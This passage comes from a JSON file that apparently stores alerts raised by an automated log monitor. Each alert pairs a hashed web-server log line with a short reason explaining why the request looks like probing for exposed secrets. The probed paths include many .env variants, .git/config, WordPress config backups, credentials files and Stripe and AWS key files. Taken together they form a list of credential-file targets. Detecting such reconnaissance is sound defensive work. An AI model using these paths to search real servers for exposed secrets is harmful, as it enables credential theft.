1.995 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:42.257183762Z" }, "a0ba8d2f018eb0a344123ae655fff00b98e51974bc050f5eb40ff2820650d988": { "type": "hash", "value": "a0ba8d2f018eb0a344123ae655fff00b98e51974bc050f5eb40ff2820650d988", "source": "auto", "reason": "HTTP GET to application.properties returning 404 can indicate probing for sensitive configuration files.", "original_line": "\u001b[0mGET /application.properties \u001b[33m404\u001b[\u003cDUR\u003e 0.704 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:56.281940404Z" }, "a183fa81c9d1020ddf449d1eafaa8ca8a797bf6f198ee6ab3ea7c540e8cb9aca": { "type": "hash", "value": "a183fa81c9d1020ddf449d1eafaa8ca8a797bf6f198ee6ab3ea7c540e8cb9aca", "source": "auto", "reason": "Request to /.env.stage is a common probing pattern to check for exposure of sensitive environment files.", "original_line": "\u001b[0mGET /.env.stage \u001b[33m404\u001b[\u003cDUR\u003e 0.553 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:46.441305084Z" }, "a33e70aa4510487fe24727bee0ea48280b707665e73d36c509000cb3857ae9a0": { "type": "hash", "value": "a33e70aa4510487fe24727bee0ea48280b707665e73d36c509000cb3857ae9a0", "source": "auto", "reason": "Access to /config/database.yml returning 404 suggests potential probing for sensitive configuration files.", "original_line": "\u001b[0mGET /config/database.yml \u001b[33m404\u001b[\u003cDUR\u003e 2.335 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:26.730634379Z" }, "a3534472998a9a4d47e84a56d7ae93b8c64009a9f055f5db7cdee1a157fe4916": { "type": "hash", "value": "a3534472998a9a4d47e84a56d7ae93b8c64009a9f055f5db7cdee1a157fe4916", "source": "auto", "reason": "Access to a likely sensitive file (.env.prod) resulting in 404; indicative of probing for environment leakage or sensitive files.", "original_line": "\u001b[0mGET /.env.prod \u001b[33m404\u001b[\u003cDUR\u003e 0.805 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:36.408155447Z" }, "a73bc33fcbf18e984a3eb3014489582255b9d5b4b0b9be492ba5ba87f6005453": { "type": "hash", "value": "a73bc33fcbf18e984a3eb3014489582255b9d5b4b0b9be492ba5ba87f6005453", "source": "auto", "reason": "Access to a hidden environment file path (/.vscode/.env) returning 404 is a common probe to detect sensitive files; not successful but warrants attention.", "original_line": "\u001b[0mGET /.vscode/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.862 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:46.874318271Z" }, "a842457f174c4234b8ce30fe53db5e58fa585c4d7ad2657f0fe61af91b1d1439": { "type": "hash", "value": "a842457f174c4234b8ce30fe53db5e58fa585c4d7ad2657f0fe61af91b1d1439", "source": "auto", "reason": "Access to a .env file via HTTP is potentially exposing sensitive configuration; 200 OK indicates the file was served, warranting alert", "original_line": "\u001b[0mGET /api/shared/.env \u001b[32m200\u001b[\u003cDUR\u003e 0.586 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:01.45400876Z" }, "ab88186b1efb2e92b4ddff90384c767decda7947094f591e00d6d743390c4e71": { "type": "hash", "value": "ab88186b1efb2e92b4ddff90384c767decda7947094f591e00d6d743390c4e71", "source": "auto", "reason": "Request to the repository metadata file /.git/HEAD can indicate probing for source code or misconfigured exposure. Not clearly malicious yet, but warrants attention.", "original_line": "\u001b[0mGET /.git/HEAD \u001b[33m404\u001b[\u003cDUR\u003e 1.409 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:08.610059848Z" }, "ac7745c23af6f0d8d227472314b0cbe8949ee4f6c8baf733e2ff6cdf8885410f": { "type": "hash", "value": "ac7745c23af6f0d8d227472314b0cbe8949ee4f6c8baf733e2ff6cdf8885410f", "source": "auto", "reason": "Request to a secrets path (stripe.json) results in 404; potential probing for sensitive files", "original_line": "\u001b[0mGET /storage/secrets/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 1.480 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:09.80299892Z" }, "adb843003fada56f1ff830e9da74cbde95125f9e7c777293be30e729e8aac065": { "type": "hash", "value": "adb843003fada56f1ff830e9da74cbde95125f9e7c777293be30e729e8aac065", "source": "auto", "reason": "Access to /env.backup path with 404 may indicate probing for sensitive environment backup file", "original_line": "\u001b[0mGET /env.backup \u001b[33m404\u001b[\u003cDUR\u003e 0.644 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:29.312383707Z" }, "af07ff3cc16139b3270e0d81cee20b87492cd8476497ede262a32207558c4a3e": { "type": "hash", "value": "af07ff3cc16139b3270e0d81cee20b87492cd8476497ede262a32207558c4a3e", "source": "auto", "reason": "Access to a hidden VSCODE config file (.vscode/sftp.json) via HTTP is unusual and could indicate probing for sensitive files.", "original_line": "\u001b[0mGET /.vscode/sftp.json \u001b[33m404\u001b[\u003cDUR\u003e 0.483 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:44.941507356Z" }, "b37b66b665d3d04df2c8f867a07e13a6af06ef2835c1cbede71c8539ec4b5618": { "type": "hash", "value": "b37b66b665d3d04df2c8f867a07e13a6af06ef2835c1cbede71c8539ec4b5618", "source": "auto", "reason": "Access to /api/config.env can indicate attempts to retrieve sensitive configuration data; while the request returned 200, the endpoint itself is commonly sensitive and may be misused.", "original_line": "\u001b[0mGET /api/config.env \u001b[32m200\u001b[\u003cDUR\u003e 12.437 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:05.21399723Z" }, "b3e2c8438ea243c7efa0a1db3af2bedd3b60e348ed72b77cbadd5fa308048fec": { "type": "hash", "value": "b3e2c8438ea243c7efa0a1db3af2bedd3b60e348ed72b77cbadd5fa308048fec", "source": "auto", "reason": "HTTP 404 indicates missing resource; not necessarily malicious, but could indicate misconfiguration or probing.", "original_line": "\u001b[0mGET /manage/env \u001b[33m404\u001b[\u003cDUR\u003e 0.558 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:05.087723986Z" }, "b6901f6c310c2fadd9d552425fc6276eec3f891028d0918c365d8e1e6be73bdb": { "type": "hash", "value": "b6901f6c310c2fadd9d552425fc6276eec3f891028d0918c365d8e1e6be73bdb", "source": "auto", "reason": "Access to a .env file via HTTP is a common probe for sensitive configuration exposure; 404 means not found but the pattern is a potential directory traversal/secret exposure attempt", "original_line": "\u001b[0mGET /src/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.128 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:08.36455584Z" }, "b7bb11d729fd13a124d50dcdd228d6bcdce6368a3b5eaf6ebde6a13de300244b": { "type": "hash", "value": "b7bb11d729fd13a124d50dcdd228d6bcdce6368a3b5eaf6ebde6a13de300244b", "source": "auto", "reason": "Access to the environment file '/.env' via HTTP is commonly used to probe for sensitive configuration and is typically anomalous.", "original_line": "\u001b[0mGET /.env \u001b[33m404\u001b[\u003cDUR\u003e 1.783 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:10.632783333Z" }, "b7f8b7a8c4af8f3db9b1e4f3b9be045c92509fbe2c4c543281abcd312e244e93": { "type": "hash", "value": "b7f8b7a8c4af8f3db9b1e4f3b9be045c92509fbe2c4c543281abcd312e244e93", "source": "auto", "reason": "Access to /env.js returning 404 can indicate probing for environment exposure or misconfiguration rather than a normal user request.", "original_line": "\u001b[0mGET /env.js \u001b[33m404\u001b[\u003cDUR\u003e 0.698 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:41.990738035Z" }, "b8579115198330ad3ee3b1d1a8d7e0f9608f72d2c3d4e070bd749359b8134b33": { "type": "hash", "value": "b8579115198330ad3ee3b1d1a8d7e0f9608f72d2c3d4e070bd749359b8134b33", "source": "auto", "reason": "Request for a potentially sensitive file (aws-secret.yaml) resulting in 404; indicative of probing for secrets", "original_line": "\u001b[0mGET /aws-secret.yaml \u001b[33m404\u001b[\u003cDUR\u003e 0.898 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:05.331813812Z" }, "b9ee538021f2bf8ed52348fcb5af499df8baf0a7356ed85d1567161da8c5ce6b": { "type": "hash", "value": "b9ee538021f2bf8ed52348fcb5af499df8baf0a7356ed85d1567161da8c5ce6b", "source": "auto", "reason": "Access attempt to wp-config.php with a 404 response is a common probe for sensitive file exposure.", "original_line": "\u001b[0mGET /wp-config.php~ \u001b[33m404\u001b[\u003cDUR\u003e 0.581 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:47.29296339Z" }, "bdbe4fb6736a22fb7d435ecc0a65847104e2d83ab772459b2437dc3e7d5d1cbe": { "type": "hash", "value": "bdbe4fb6736a22fb7d435ecc0a65847104e2d83ab772459b2437dc3e7d5d1cbe", "source": "auto", "reason": "Request to a sensitive configuration file path (config/application.yml) handling a 404, which may indicate probing for config exposure.", "original_line": "\u001b[0mGET /config/application.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.529 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:51.52758417Z" }, "bf07e2c21c3ec2fecebb5a32aff1a78c954a506fd6bd5ab491b0bc56a33550af": { "type": "hash", "value": "bf07e2c21c3ec2fecebb5a32aff1a78c954a506fd6bd5ab491b0bc56a33550af", "source": "auto", "reason": "Access to /info.php returning 404 can indicate probing for server info or misconfiguration; not definitive but worth alerting.", "original_line": "\u001b[0mGET /info.php \u001b[33m404\u001b[\u003cDUR\u003e 0.576 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:21.42198843Z" }, "bfd1d8d050ebf3c6b1c5d91f8b47460eb3494b4b2c07d0ea0040c1ca320ef648": { "type": "hash", "value": "bfd1d8d050ebf3c6b1c5d91f8b47460eb3494b4b2c07d0ea0040c1ca320ef648", "source": "auto", "reason": "Request to a sensitive file path (/site/.env) often indicates probing for environment configuration, a common attacker action. Line is a standard 404 response but merits alert for potential credential/environment leakage risk.", "original_line": "\u001b[0mGET /site/.env \u001b[33m404\u001b[\u003cDUR\u003e 4.515 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:09.062422701Z" }, "c0279db58071815f952721e96cd9ecf38def234449ae947df53eada46839bd9a": { "type": "hash", "value": "c0279db58071815f952721e96cd9ecf38def234449ae947df53eada46839bd9a", "source": "auto", "reason": "Access to /config/initializers/stripe.rb is often probed by attackers to discover server-side configuration and potential exposure of sensitive files. The 404 indicates the resource does not exist, but the pattern is a targeted probe.", "original_line": "\u001b[0mGET /config/initializers/stripe.rb \u001b[33m404\u001b[\u003cDUR\u003e 1.217 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:20.105914876Z" }, "c3276fa691f4e24b8d84a4727a7d13e5ec2d2075835efd94aef92f019ace9a88": { "type": "hash", "value": "c3276fa691f4e24b8d84a4727a7d13e5ec2d2075835efd94aef92f019ace9a88", "source": "auto", "reason": "Access to a specific script under /settings (stripe.py) with a 404 response; could indicate probing for sensitive files.", "original_line": "\u001b[0mGET /settings/stripe.py \u001b[33m404\u001b[\u003cDUR\u003e 0.738 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:14.579499633Z" }, "c42d982bd1d13b80c943649ab2ba26e9e195d859b733a2ead053405a128428bd": { "type": "hash", "value": "c42d982bd1d13b80c943649ab2ba26e9e195d859b733a2ead053405a128428bd", "source": "auto", "reason": "Access to a sensitive file (.env) is being requested, which is a common probing pattern. The request returns a 404, but the attempt itself is notable.", "original_line": "\u001b[0mGET /portal/.env \u001b[33m404\u001b[\u003cDUR\u003e 5.167 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:31.340635723Z" }, "c479fbcdfc20d12219b2573a3047ed76c6d2ee0ee64708cb3a56b5dd84a2489e": { "type": "hash", "value": "c479fbcdfc20d12219b2573a3047ed76c6d2ee0ee64708cb3a56b5dd84a2489e", "source": "auto", "reason": "Request to access a sensitive file path (/storage/.env) resulting in 404, indicating potential probing for secrets.", "original_line": "\u001b[0mGET /storage/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.015 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:52.474182409Z" }, "c47a13b0f6a8c633ef86a6ae97a577a3f0909cb6aa3637c1bd5959585332f59e": { "type": "hash", "value": "c47a13b0f6a8c633ef86a6ae97a577a3f0909cb6aa3637c1bd5959585332f59e", "source": "auto", "reason": "Request for a sensitive file path /.env.aws returning 404 suggests probing for environment configuration files", "original_line": "\u001b[0mGET /.env.aws \u001b[33m404\u001b[\u003cDUR\u003e 0.593 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:10.789814784Z" }, "c74c69f51808f76232714449f0bb7b414cbabbe1b12d936fd1594e11a423a8e6": { "type": "hash", "value": "c74c69f51808f76232714449f0bb7b414cbabbe1b12d936fd1594e11a423a8e6", "source": "auto", "reason": "Request to a sensitive file at the root (stripe.ini) may indicate probing for configuration exposure or sensitive files; not definitive malicious but warrants alert.", "original_line": "\u001b[0mGET /stripe.ini \u001b[33m404\u001b[\u003cDUR\u003e 2.728 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:27.287859909Z" }, "c7d55978f674fa5e91b12d32bdd9bb40fb1408cc22ebba6ccdea8990ada6c619": { "type": "hash", "value": "c7d55978f674fa5e91b12d32bdd9bb40fb1408cc22ebba6ccdea8990ada6c619", "source": "auto", "reason": "Unusual request to a log file path returning 404, suggesting possible probing or misconfigured client attempting to access internal resources.", "original_line": "\u001b[0mGET /storage/logs/laravel.log \u001b[33m404\u001b[\u003cDUR\u003e 0.551 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:28.8246785Z" }, "c97a46b79bfa9deface8f9bdd93d7e6151322c42055b4fa8f8c021dcd134dd6a": { "type": "hash", "value": "c97a46b79bfa9deface8f9bdd93d7e6151322c42055b4fa8f8c021dcd134dd6a", "source": "auto", "reason": "Request for credentials.txt with 404 response suggests probing for sensitive files; not confirmed malicious but warrants alert.", "original_line": "\u001b[0mGET /credentials.txt \u001b[33m404\u001b[\u003cDUR\u003e 0.574 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:20.416221658Z" }, "ca9b078226c29abe7534ceffc508b83571d9f7abacb6ce543add39ed569abedd": { "type": "hash", "value": "ca9b078226c29abe7534ceffc508b83571d9f7abacb6ce543add39ed569abedd", "source": "auto", "reason": "Request to access a sensitive file (.env) which is commonly probed by attackers; although it returned 404, it's unusual and warrants monitoring.", "original_line": "\u001b[0mGET /.env.vite \u001b[33m404\u001b[\u003cDUR\u003e 0.649 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:46.426950447Z" }, "cc09a1e81c8627bed87b1619a932eb247116a0f277070b7ed4182b666442dec4": { "type": "hash", "value": "cc09a1e81c8627bed87b1619a932eb247116a0f277070b7ed4182b666442dec4", "source": "auto", "reason": "HTTP 404 on /payment could be normal but may indicate probing or misconfiguration; not clearly malicious but warrants attention.", "original_line": "\u001b[0mGET /payment \u001b[33m404\u001b[\u003cDUR\u003e 0.604 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:53.064662151Z" }, "ce0b68f89edc9344c5929ad397b88d1224bc332d052d247cbf71d185b5f8305d": { "type": "hash", "value": "ce0b68f89edc9344c5929ad397b88d1224bc332d052d247cbf71d185b5f8305d", "source": "auto", "reason": "Request to a sensitive file (.env.template) returning 404 suggests probing for secrets exposure.", "original_line": "\u001b[0mGET /.env.template \u001b[33m404\u001b[\u003cDUR\u003e 0.570 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:57.760233541Z" }, "ce8e61972655342c3891b17606b940f1ec2541e2668117197876c3dfb9834d79": { "type": "hash", "value": "ce8e61972655342c3891b17606b940f1ec2541e2668117197876c3dfb9834d79", "source": "auto", "reason": "Access to a sensitive file path /.env.old resulting in 404; typical probe for sensitive files", "original_line": "\u001b[0mGET /.env.old \u001b[33m404\u001b[\u003cDUR\u003e 5.354 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:03.651587162Z" }, "ceae2714f798e59171ed04e8b8fb4d784c6d398882eba5b8da69991ec8eaec82": { "type": "hash", "value": "ceae2714f798e59171ed04e8b8fb4d784c6d398882eba5b8da69991ec8eaec82", "source": "auto", "reason": "Access to a WordPress REST API endpoint returning 404 could indicate probing or misconfiguration.", "original_line": "\u001b[0mGET /wp-json/wc/v3/settings/checkout \u001b[33m404\u001b[\u003cDUR\u003e 0.902 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:34.117512726Z" }, "d16e7993a42889c78d8f1ccdad14fe87d11416e4093233a3ca052dafbe08d1e1": { "type": "hash", "value": "d16e7993a42889c78d8f1ccdad14fe87d11416e4093233a3ca052dafbe08d1e1", "source": "auto", "reason": "Access to a local environment file (.env) via HTTP is a common probing pattern; the 404 response suggests the file does not exist, but the attempt may indicate reconnaissance.", "original_line": "\u001b[0mGET /local/.env \u001b[33m404\u001b[\u003cDUR\u003e 25.778 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:17.852814641Z" }, "d34c1075c6e533cc9f9357cb67ad59038e4810d008c6c6a41484a70e4785b660": { "type": "hash", "value": "d34c1075c6e533cc9f9357cb67ad59038e4810d008c6c6a41484a70e4785b660", "source": "auto", "reason": "Request to credentials.json exists; HTTP 404 but probing for credentials could indicate sensitive file discovery", "original_line": "\u001b[0mGET /credentials.json \u001b[33m404\u001b[\u003cDUR\u003e 0.707 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:14.742145824Z" }, "d37264b65a343ae30962f93540b31c272fea2fc27c6ec551218351def4b780c8": { "type": "hash", "value": "d37264b65a343ae30962f93540b31c272fea2fc27c6ec551218351def4b780c8", "source": "auto", "reason": "Access to a sensitive file (.env) on a web path returning 404 indicates potential probing for secrets; common attacker pattern though not confirmed.", "original_line": "\u001b[0mGET /website/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.615 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:38.55679273Z" }, "d39e076aa9bbf816364b3900e8e86e8bc955a6b6cfed62d618094457ac6e853e": { "type": "hash", "value": "d39e076aa9bbf816364b3900e8e86e8bc955a6b6cfed62d618094457ac6e853e", "source": "auto", "reason": "GET request to a potential configuration file path (config/parameters.yml) returning 404 may indicate probing for sensitive config data.", "original_line": "\u001b[0mGET /config/parameters.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.627 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:38.989662465Z" }, "d3d805174e40a50760c2fef98d4f1942e233cf8025951646fb89538957fcd3ea": { "type": "hash", "value": "d3d805174e40a50760c2fef98d4f1942e233cf8025951646fb89538957fcd3ea", "source": "auto", "reason": "Access attempt to a sensitive environment file (.env) directory, resulting in a 404. This pattern is commonly used to probe for sensitive files.", "original_line": "\u001b[0mGET /docker/.env \u001b[33m404\u001b[\u003cDUR\u003e 3.859 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:44.010491637Z" }, "d3e45156493d859c8cbd413a77403503eaa1b9ba1d6644640a9202642d9c3be4": { "type": "hash", "value": "d3e45156493d859c8cbd413a77403503eaa1b9ba1d6644640a9202642d9c3be4", "source": "auto", "reason": "Access to a sensitive file path (/database/.env) is often used to probe for secrets or misconfigured environments.", "original_line": "\u001b[0mGET /database/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.668 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:26.231735619Z" }, "d5e07a664a86c4adb14b15f637521b8f9500ffe09cce22696c6074c62a6f745d": { "type": "hash", "value": "d5e07a664a86c4adb14b15f637521b8f9500ffe09cce22696c6074c62a6f745d", "source": "auto", "reason": "Access to a sensitive file (.env) at a public path commonly indicates probing for configuration leakage. The request returned 404, but the pattern is a known indicator of potential credential exposure attempts.", "original_line": "\u001b[0mGET /public/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.670 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:18.070114918Z" }, "d74d25563307b4f23a5fb1f5af0f300498c1398783394d38806325fe53c44d01": { "type": "hash", "value": "d74d25563307b4f23a5fb1f5af0f300498c1398783394d38806325fe53c44d01", "source": "auto", "reason": "HTTP GET to a sensitive path /.env.backup returning 404; attempts to access environment/config files are common reconnaissance patterns", "original_line": "\u001b[0mGET /.env.backup \u001b[33m404\u001b[\u003cDUR\u003e 0.637 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:57.18617302Z" }, "d821142bb91470628b008c1a42b8cec78bc3fe5a92a842c5888500f820855a41": { "type": "hash", "value": "d821142bb91470628b008c1a42b8cec78bc3fe5a92a842c5888500f820855a41", "source": "auto", "reason": "HTTP 404 on a CONFIG file path (parameters.yml) can indicate probing for sensitive config or misconfigured routes; not necessarily malicious but warrants scrutiny.", "original_line": "\u001b[0mGET /app/config/parameters.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.617 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:32.978685128Z" }, "da1304d28e2b8500e89b325b4d19a90af35b1dd4247dd9551a8f8961ee46f256": { "type": "hash", "value": "da1304d28e2b8500e89b325b4d19a90af35b1dd4247dd9551a8f8961ee46f256", "source": "auto", "reason": "Access to /.git/config is a common probing target to locate sensitive repository configuration; while not definitive, it indicates suspicious intent.", "original_line": "\u001b[0mGET /.git/config \u001b[33m404\u001b[\u003cDUR\u003e 1.110 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:04.503036331Z" }, "deff4e1f92220441be00c1f2936735efde8c95e54f0419bc2ac6e12ee9229e99": { "type": "hash", "value": "deff4e1f92220441be00c1f2936735efde8c95e54f0419bc2ac6e12ee9229e99", "source": "auto", "reason": "Request to /stripe.env returned 404, which could indicate probing for sensitive files or misconfigured routing", "original_line": "\u001b[0mGET /stripe.env \u001b[33m404\u001b[\u003cDUR\u003e 3.504 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:32.575005163Z" }, "e070de46e7c2e0b14d4e7d37540681e341d7bd5010da4f6471f91cc677a7c604": { "type": "hash", "value": "e070de46e7c2e0b14d4e7d37540681e341d7bd5010da4f6471f91cc677a7c604", "source": "auto", "reason": "Access attempt to a sensitive file path (.env.dist) detected (likely directory traversal probe). Not definitive malicious activity, but warrants alerting.", "original_line": "\u001b[0mGET /.env.dist \u001b[33m404\u001b[\u003cDUR\u003e 0.576 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:47.90073977Z" }, "e22e945c851210dc6c6d62f0d854197044896de6ba71d47b174f83363d716e5c": { "type": "hash", "value": "e22e945c851210dc6c6d62f0d854197044896de6ba71d47b174f83363d716e5c", "source": "auto", "reason": "HTTP 404 for a config file path (config/payment.yml) can indicate probing for sensitive files. Single occurrence not definitive, but warrants alerting.", "original_line": "\u001b[0mGET /config/payment.yml \u001b[33m404\u001b[\u003cDUR\u003e 22.212 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:30.261984012Z" }, "e310bee1b325571fc5a3f0104cea0e78b238738a6d08e1ea08ac85cf5a04b72d": { "type": "hash", "value": "e310bee1b325571fc5a3f0104cea0e78b238738a6d08e1ea08ac85cf5a04b72d", "source": "auto", "reason": "Request to a sensitive path ( /stripe.key ) that returned 404. Could indicate probing for sensitive files.", "original_line": "\u001b[0mGET /stripe.key \u001b[33m404\u001b[\u003cDUR\u003e 1.421 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:48.351898338Z" }, "e68237775e785ada4f2cc76ca89e0e18729a2426731bbf8c0354f02c807fdfc9": { "type": "hash", "value": "e68237775e785ada4f2cc76ca89e0e18729a2426731bbf8c0354f02c807fdfc9", "source": "auto", "reason": "HTTP 404 on /pricing could indicate broken links or probing; not necessarily malicious but merits attention due to error rate", "original_line": "\u001b[0mGET /pricing \u001b[33m404\u001b[\u003cDUR\u003e 0.733 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:10:48.92871815Z" }, "e8a69e5da8efd6a2cb9876d475391bd96e9f5f59371ede651c7a987a2a0edf65": { "type": "hash", "value": "e8a69e5da8efd6a2cb9876d475391bd96e9f5f59371ede651c7a987a2a0edf65", "source": "auto", "reason": "Access attempt to a sensitive file wp-config.php.old returning 404 suggests probing for configuration files.", "original_line": "\u001b[0mGET /wp-config.php.old \u001b[33m404\u001b[\u003cDUR\u003e 3.247 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:16.889985865Z" }, "ebbad52b9e7d690feba78f2e7df645a78affcca86242a9e2ef60081a7681e514": { "type": "hash", "value": "ebbad52b9e7d690feba78f2e7df645a78affcca86242a9e2ef60081a7681e514", "source": "auto", "reason": "Access to /config.env is unusual and often indicates probing for sensitive configuration; a 404 on this path is common for scans but warrants attention.", "original_line": "\u001b[0mGET /config.env \u001b[33m404\u001b[\u003cDUR\u003e 4.647 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:55.939250679Z" }, "ec610a600ea34ccfbcaff092e93106a53c20f91f995b547dcc1dc6f59cc357a4": { "type": "hash", "value": "ec610a600ea34ccfbcaff092e93106a53c20f91f995b547dcc1dc6f59cc357a4", "source": "auto", "reason": "Access to /admin returned 404, which can indicate probing for an admin interface.", "original_line": "\u001b[0mGET /admin \u001b[33m404\u001b[\u003cDUR\u003e 0.588 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:52.055575947Z" }, "f0561aeccb3161516f3b61c26616e3322c24a3a0e70f9cefa88f30878be99faa": { "type": "hash", "value": "f0561aeccb3161516f3b61c26616e3322c24a3a0e70f9cefa88f30878be99faa", "source": "auto", "reason": "HTTP 404 on a webhook settings endpoint could indicate probing or misconfigured webhook path.", "original_line": "\u001b[0mGET /webhooks/settings.json \u001b[33m404\u001b[\u003cDUR\u003e 0.799 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:16.646729227Z" }, "f1310b19adcab78de774ac8622a51b49f98b5df19e5ceaff39e8b5a18e5d1a58": { "type": "hash", "value": "f1310b19adcab78de774ac8622a51b49f98b5df19e5ceaff39e8b5a18e5d1a58", "source": "auto", "reason": "Access to /admin/settings with 404 indicates probing or misconfiguration exposure; not clearly malicious but warrants monitoring.", "original_line": "\u001b[0mGET /admin/settings \u001b[33m404\u001b[\u003cDUR\u003e 0.931 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:09.464566878Z" }, "f13340bb7fdda37cd9a11994edf4244dc420f11f325f0adff808aa81ebede1fe": { "type": "hash", "value": "f13340bb7fdda37cd9a11994edf4244dc420f11f325f0adff808aa81ebede1fe", "source": "auto", "reason": "404 for /phpinfo indicates a potential probing attempt for phpinfo exposure", "original_line": "\u001b[0mGET /phpinfo \u001b[33m404\u001b[\u003cDUR\u003e 0.566 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:30.369575842Z" }, "f2fc81311cbd3959b104fc63105255bff5f078b2b5bc6c3ddb4915d0c7fef3cf": { "type": "hash", "value": "f2fc81311cbd3959b104fc63105255bff5f078b2b5bc6c3ddb4915d0c7fef3cf", "source": "auto", "reason": "Access to wp-config.old is a common probing pattern targeting WordPress configurations; could indicate attempted discovery of sensitive files.", "original_line": "\u001b[0mGET /wp-config.old \u001b[33m404\u001b[\u003cDUR\u003e 0.915 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:07.825552045Z" }, "f3d00df2120bc520905a500b1cd0616afce7208007c26f9b3f2b95151e9a7a89": { "type": "hash", "value": "f3d00df2120bc520905a500b1cd0616afce7208007c26f9b3f2b95151e9a7a89", "source": "auto", "reason": "Access to a potential environment map file (__env.js.map) can indicate probing for deployment details; not definitive malicious activity but worth alerting.", "original_line": "\u001b[0mGET /__env.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.731 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:48.738747126Z" }, "f3d4d36df0a984db492cd2ff51477d6d1d1c36a8d67354ec2e24a219389b4bea": { "type": "hash", "value": "f3d4d36df0a984db492cd2ff51477d6d1d1c36a8d67354ec2e24a219389b4bea", "source": "auto", "reason": "Requesting a sensitive file (.env) which is commonly targeted for information disclosure attempts. The 404 status means not found, but probing behavior is suspicious.", "original_line": "\u001b[0mGET /app/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.231 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:39.98719342Z" }, "f540c53b0c80c5042756dc999f554f9e4001daa81c6783e18f15b6fc0f69a76a": { "type": "hash", "value": "f540c53b0c80c5042756dc999f554f9e4001daa81c6783e18f15b6fc0f69a76a", "source": "auto", "reason": "HTTP 404 on a WordPress REST API endpoint may indicate probing or misconfiguration; not clearly malicious but warrants attention.", "original_line": "\u001b[0mGET /wp-json/wc/v2/payment_gateways \u001b[33m404\u001b[\u003cDUR\u003e 0.652 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:27.994832547Z" }, "f9e95da58df1f4b9388fd8437f06e33fc9b2ff2222087d6a4febb91bb0835a0d": { "type": "hash", "value": "f9e95da58df1f4b9388fd8437f06e33fc9b2ff2222087d6a4febb91bb0835a0d", "source": "auto", "reason": "Access to 